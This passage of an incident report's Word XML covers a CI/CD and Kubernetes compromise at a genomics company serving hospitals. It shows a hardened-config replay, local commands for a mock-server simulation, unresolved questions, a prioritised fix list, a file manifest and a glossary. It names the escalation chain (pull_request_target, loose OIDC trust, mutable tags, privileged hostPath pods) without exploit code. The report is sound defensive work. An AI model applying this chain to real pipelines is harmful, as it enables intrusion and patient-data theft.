        <w:br/>
        <w:t xml:space="preserve">      "hospital": "hospital-group-05",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "sequence_hash": "54f13baf2e6af5e0",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "size_kb": 4204</w:t>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "sample_id": "HELIX-SMP-000005",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "patient_ref": "PT-100005",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "hospital": "hospital-group-06",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "sequence_hash"</w:t>
        <w:br/>
        <w:t>... (trimmed, full log in prototype/data/simulation.log)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.3 Fixed mode (same attack, hardened config)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>Restart with FIXED=true python3 app.py and re-run attacker.py: trust pinned to exact repo/workflow/ref, tags immutable + digest-pinned, stale binding removed + automount off, admission denies hostPath / + privileged, export allow-listed to hospital buckets. Result: Step 2 DENIED (sub doesn't match trust) and the chain stops; even with a hypothetical bypass, Steps 5/6/7/10 each independently DENY with a reason. That's defence in depth — we fixed every door, not just the first.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.4 How to reproduce</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>cd prototype</w:t>
        <w:br/>
        <w:t>python3 app.py &gt; data/server.log 2&gt;&amp;1 &amp;   # or: FIXED=true python3 app.py</w:t>
        <w:br/>
        <w:t>sleep 2</w:t>
        <w:br/>
        <w:t>python3 attacker.py | tee data/simulation.log</w:t>
        <w:br/>
        <w:t># dashboard: open http://localhost:8471/  |  state: curl localhost:8471/api/state</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>8. What we honestly couldn't prove</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Earlier rehearsal? The CI/cloud log mismatch (F6) plus 90-day CI retention means testing earlier in 2026 is possible and unanswerable. Recommendation: align all identity/workload logs to ≥400 days before drawing conclusions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Runner implants? Persistence was available (F8) and telemetry absent (F15). Assume the fleet is compromised: rebuild from clean images, rotate all credentials that ever touched the runners, then monitor fresh builds for callbacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>What ran with node access (F14/F15)? Unknown and unknowable. Assume node-level credential harvesting; rotate cluster credentials and review all workloads scheduled 15 Nov–9 Jan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Alert provenance (F20 vs F32): given the SOC/K8s-audit routing, confirm independently how the privileged-pod alert reached the SOC — undocumented feed vs human escalation. It affects what you fix first.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>9. Fix list — what to do Monday morning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>9.1 Stop the bleeding (this week)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Priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Kills</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Effort</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>P0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Pin HelixDeploy trust to exact repo + workflow + ref; split roles per trust tier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>V2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Hours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>P0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Freeze prod tags; repin jobs by digest; sign + verify images</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>V3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Days</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>P0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Delete pipeline-reader→system:authenticated; set automount=false default</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>V4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Hours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>P0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Enforce admission policy: deny hostPath / + privileged; alert on combo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>V5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Days</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>P0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Allow-list export destinations; require LIS order ID per export</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>V6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Days</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>P0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Rebuild runner fleet from clean images; rotate exposed creds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F8/F15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Days</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>9.2 Close the detection gaps (this month)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Route K8s API audit to the SOC (fix F32); add runbooks for role-chain traversal, registry-push anomaly, RBAC change, reads-without-orders (fix F23).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Chart the invariants that caught this in hindsight: assumes-per-pipeline-run (F16), reads-per-LIS-delivery (F19), hostPath+privileged combo rate (F14/F21). Alert on breakage, not raw volume.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Give the SOC read access to LIS delivery counts (or a daily feed) so 'month-end batch' is checkable in one click (F19/F22).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Align log retentions (CI ≥ cloud audit) and reconcile weekly (F6).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Deploy node/runtime telemetry that was evaluated in 2024 (F15).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>9.3 Fix the system (this quarter)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Split CI into untrusted-build (no secrets, pull_request) + trusted-publish (pull_request_target with explicit maintainer approval for first-time contributors). Require approval-to-run, not just approval-to-merge (F3/F27).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Move to ephemeral runners (per-job VMs/containers) or harden persistence boundaries (F7/F8).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Build an automated reachable-permissions graph over OIDC trusts + role chains + K8s bindings; block merges that add unreviewed transitive reach (F25/F26). Inventory every binding quarterly (F12).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Rescope the pentest to include CI/CD + K8s + IAM composition (F28); add a purple-team replay of this exact chain yearly using the shipped prototype.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Reconcile the '24h SOC' contract language with actual log coverage until F32/F23 are closed — the gap is material to hospital customers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Appendix A — simulation log (how to read it)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>The replay prints 12 sections (Steps 0–11 + final stats). Step 0 is passive recon (no server call). Steps 1–10 each show the curl-equivalent, the server's JSON verdict (allowed + why), and the real-case finding it maps to. Step 11 rules out the distractors. Final stats print reads (31,000), LIS deliveries (4,900), unexplained gap (26,100), exports, and the three role assumptions. Regenerate any time with prototype/run.sh.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Appendix B — file manifest (this ZIP)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Path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>What it is</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>report/Helix-Incident-Report.docx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>This report (Word)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>report/Helix-Incident-Report.pdf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>This report (PDF, same content)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>prototype/app.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Mock estate server (stdlib-only, ~450 lines)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>prototype/attacker.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Kill-chain replay (Steps 0–11)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>prototype/architecture.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Figure 1 diagram</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>prototype/README.md</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Run instructions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>prototype/run.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>One-shot: boot + replay + save logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>prototype/data/simulation.log</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Actual replay output from our run</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>prototype/data/audit.log</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Machine-readable audit trail from our run</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>prototype/data/sequences_sample.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>20 dummy genome records (sample)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>docs/01-findings-categorisation.md</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>All 32 findings, bucketed with reasons</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>docs/02-what-happened-explained.md</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Long plain-language narrative + vuln table</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>docs/03-kill-chain.md</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>11-step chain (Title / Tool / Details)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Appendix C — glossary (for non-engineers)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Term</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Plain meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Pull request (PR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A suggested change to shared code, filed by anyone</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>pull_request_target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A CI setting that tests suggestions using the owner's credentials — risky for public repos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>OIDC / sub claim</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A short-lived ID card minted per CI run; 'sub' says which repo/workflow it came from</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Assume-role / chaining</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Swapping one digital badge for another you're allowed to hold</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Registry / tag / digest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Shelf of starting kits; tag = movable label, digest = unchangeable serial number</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Kubernetes / pod / RBAC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Factory floor / single job / the rulebook for who can touch what</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
